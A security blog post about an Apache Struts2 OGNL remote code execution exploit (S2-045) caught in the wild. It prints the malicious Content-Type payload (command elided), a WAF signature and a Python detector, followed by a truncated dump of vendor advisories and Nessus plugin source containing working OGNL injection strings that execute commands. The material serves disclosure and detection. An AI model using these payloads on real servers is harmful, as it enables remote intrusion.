Two days ago Apache published a fix for a new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).
Struts2 RCE attacks in the wild
This vulnerability allows an attacker to execute arbitrary Java code on the application server.
We can confirm that we caught the first exploit for this vulnerability in the wild. And this is crazy. Like the previous OGNL exploits, this one is also built from OGNL expressions that construct and run a shell command through a sequence of Java classes.
#### Exploit
[Wallarm](<http://wallarm.com>) first caught the exploit on Mar 8, 03:34 am. The sample malicious HTTP request is shown below:
```http
GET /valid-struts.action HTTP/1.1
User-Agent: any
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```
#### Mitigation
Please check that you've already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).
If you are unable to update Struts2 immediately, you should apply a virtual patch to your WAF. The exploit is essentially similar to the previous OGNL exploits, but it is unlikely to be covered by many existing WAF signatures. If you use an old-fashioned Web Application Firewall, make sure to add this string as a new signature:
```
%{(#_='multipart/form-data')
```
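As an added example that is not part of the original post: a small Python checker that applies the signature above to a raw HTTP request, adds a broader check for any OGNL expression opener in the Content-Type header, and compares a Struts 2 version string against the fixed releases named above. The sample requests, the heuristic and the version logic are my own assumptions, not Wallarm's code.

```python
import re
from typing import Dict, Tuple

# Releases the post names as fixed: Struts 2.3.32 and 2.5.10.1. Anything older
# on the same branch is treated here as still needing the update (assumption:
# the post gives no lower bound for the affected range).
FIXED_VERSIONS = {"2.3": (2, 3, 32), "2.5": (2, 5, 10, 1)}

# The literal string the post recommends as a WAF signature.
WALLARM_SIGNATURE = "%{(#_='multipart/form-data')"

# Broader heuristic (assumed, not from the post): a well-formed Content-Type
# value never contains an OGNL expression opener, so "%{" or "${" in that
# header is suspicious on its own, whatever variable names follow it.
OGNL_OPENER = re.compile(r"[%$]\{")


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and a dict of headers.

    Header names are lower-cased so lookups are case-insensitive; only the
    head (everything before the first blank line) is examined.
    """
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(r"\r?\n", head)
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # not a header line; ignore it
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def classify(raw: str) -> Dict[str, object]:
    """Apply the literal signature and the heuristic to one raw request."""
    request_line, headers = parse_request(raw)
    content_type = headers.get("content-type", "")
    signature_match = WALLARM_SIGNATURE in content_type
    ognl_in_content_type = bool(OGNL_OPENER.search(content_type))
    return {
        "request": request_line,
        "signature_match": signature_match,
        "ognl_in_content_type": ognl_in_content_type,
        "verdict": "block" if (signature_match or ognl_in_content_type) else "allow",
    }


def needs_update(version: str) -> bool:
    """True when a Struts 2 version string is older than the fixed release on its branch."""
    parts = tuple(int(p) for p in version.strip().split("."))
    fixed = FIXED_VERSIONS.get(".".join(str(p) for p in parts[:2]))
    if fixed is None:
        return True  # branch not covered by the post; flag it for review
    return parts < fixed  # tuple comparison: (2, 5, 10) < (2, 5, 10, 1)


# Constructed sample requests (not captured traffic). The first one is a
# shortened form of the request shown in the post, with the payload elided.
MALICIOUS_REQUEST = (
    "GET /valid-struts.action HTTP/1.1\r\n"
    "User-Agent: any\r\n"
    "Content-Type: %{(#_='multipart/form-data')"
    ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#cmds=(<some malicious code here>))}\r\n\r\n"
)
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary1234\r\n\r\n"
    "------FormBoundary1234\r\nContent-Disposition: form-data; name=\"f\"\r\n\r\n"
)


if __name__ == "__main__":
    for raw in (MALICIOUS_REQUEST, BENIGN_UPLOAD):
        print(classify(raw))
    for v in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(v, "needs update" if needs_update(v) else "fixed")
```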
#### History
Here is a list of all historical OGNL security issues in Struts2:
* <https://www.cvedetails.com/cve/CVE-2016-3093/>
* <https://www.cvedetails.com/cve/CVE-2016-0785/>
* <https://www.cvedetails.com/cve/CVE-2013-2251/>
* <https://www.cvedetails.com/cve/CVE-2013-2135/>
* <https://www.cvedetails.com/cve/CVE-2013-2134/>
* <https://www.cvedetails.com/cve/CVE-2013-2115/>
* <https://www.cvedetails.com/cve/CVE-2013-1966/>
* <https://www.cvedetails.com/cve/CVE-2013-1965/>
* <https://www.cvedetails.com/cve/CVE-2012-4387/>
* <https://www.cvedetails.com/cve/CVE-2012-0838/>
* <https://www.cvedetails.com/cve/CVE-2012-0391/>
* <https://www.cvedetails.com/cve/CVE-2010-1870/>
* <https://www.cvedetails.com/cve/CVE-2008-6504/>
This suggests that OGNL as a technology is broken altogether.

* * *
[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-25T00:00:00", "type": "f5", "title": "SOL17588029 - Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2016-04-29T00:00:00", "id": "SOL17588029", "href": "http://support.f5.com/kb/en-us/solutions/public/k/17/sol17588029.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "huawei": [{"lastseen": "2021-12-30T12:28:06", "description": "Apache Struts2 is a second-generation and enterprise-ready Java web application framework based on the Model-View-Controller (MVC) architecture. This advisory describes four vulnerabilities of Apache Struts 2.0.0 - 2.3.15. 
Huawei products and applications using the above versions of Apache Struts are therefore affected by the vulnerabilities, not due to a defect of the Huawei product or application.\n\nThe Apache Struts2 contains the vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks.( Vulnerability ID : HWNSIRT-2013-0601) The link is at [http://struts.apache.org/release/2.3.x/docs/s2-014.html ](<http://struts.apache.org/release/2.3.x/docs/s2-014.html%20>)(CVE-2013-2115, CVE-2013-1966)\n\nThe Apache Struts2 contains the vulnerability introduced by wildcard matching mechanism or double evaluation of OGNL Expression allows remote command execution.( Vulnerability ID : HWNSIRT-2013-0704) The link is at <http://struts.apache.org/release/2.3.x/docs/s2-015.html> (CVE-2013-2134, CVE-2013-2135)\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"action:\"/\"redirect:\"/\"redirectAction:\", which may result in remote command execution. (Vulnerability ID : HWNSIRT-2013-0705) .The link is at <http://struts.apache.org/release/2.3.x/docs/s2-016.html> ([CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>)).\n\nThe Apache Struts2 contains the vulnerability introduced by manipulating parameters prefixed with \"redirect:\"/\"redirectAction:\" which allows open redirects. (Vulnerability ID : HWNSIRT-2013-0706). The link is at <http://struts.apache.org/release/2.3.x/docs/s2-017.html> (CVE-2013-2248). \n\nApache released Struts 2.3.15.1 as an official patch for Struts 2. Upgrading to Struts 2.3.15.1 is the only workaround. Based on the Struts 2.3.15.1 patch, Huawei provides a fix for the vulnerability. 
\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-30T00:00:00", "type": "huawei", "title": "Security Advisory-Multiple Apache Struts2 Vulnerabilities in Huawei Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-08T00:00:00", "id": "HUAWEI-SA-20130730-STRUTS", "href": "https://www.huawei.com/en/psirt/security-advisories/2013/hw-276819", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T15:38:38", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. 
\n\nNote that this version of Struts 2 is reportedly also affected by multiple cross-site scripting (XSS) vulnerabilities as well as session access and manipulation attacks; however, Nessus has not tested for these issues. \n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66935);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1965\", \"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60082, 60166, 60167);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. 
Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-014.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code 
Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp /.do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = 
make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"/${%23context['xwork.MethodAccessor.denyMethod\" +\n \"Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true),\" +\n \"(@java.lang.Runtime@getRuntime()).exec('\" +cmd+ \"').waitFor()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/(0)?\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:39:03", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. 
Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66931);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. 
Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-015.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\nforeach url (urls)\n{\n magic = rand();\n vuln = FALSE;\n\n vuln_url = url + \"/${\" + magic + \"+5}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"404 Not Found\") &&\n ((magic + 5) >< res[2])\n )\n {\n 
vuln = TRUE;\n output = strstr(res[2], \"<h1>\");\n break;\n }\n\n msg = SCRIPT_NAME - \".nasl\" + \"-\" + magic;\n vuln_url = url + \"/${%23w%3d%23context.get('com.opensymphony.xwork2.\" +\n \"dispatcher.HttpServletResponse').getWriter(),\"+\n \"%23w.print('Nessus%20Response:%20'),%23w.println('\" +msg+\n \"'),%23w.flush(),%23w.close()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ \"^Nessus Response: \"+msg)\n )\n {\n vuln = TRUE;\n output = chomp(res[2]);\n break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 3,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : output\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:39", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. 
It, therefore, is affected by a remote command execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.3 RCE (S2-015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3.NASL", "href": "https://www.tenable.com/plugins/nessus/117389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117389);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.3 RCE (S2-015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.3. 
It, therefore, is affected by a remote command\nexecution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-015\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.3 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.2\", \"fixed_version\" : \"2.3.14.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:39", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, 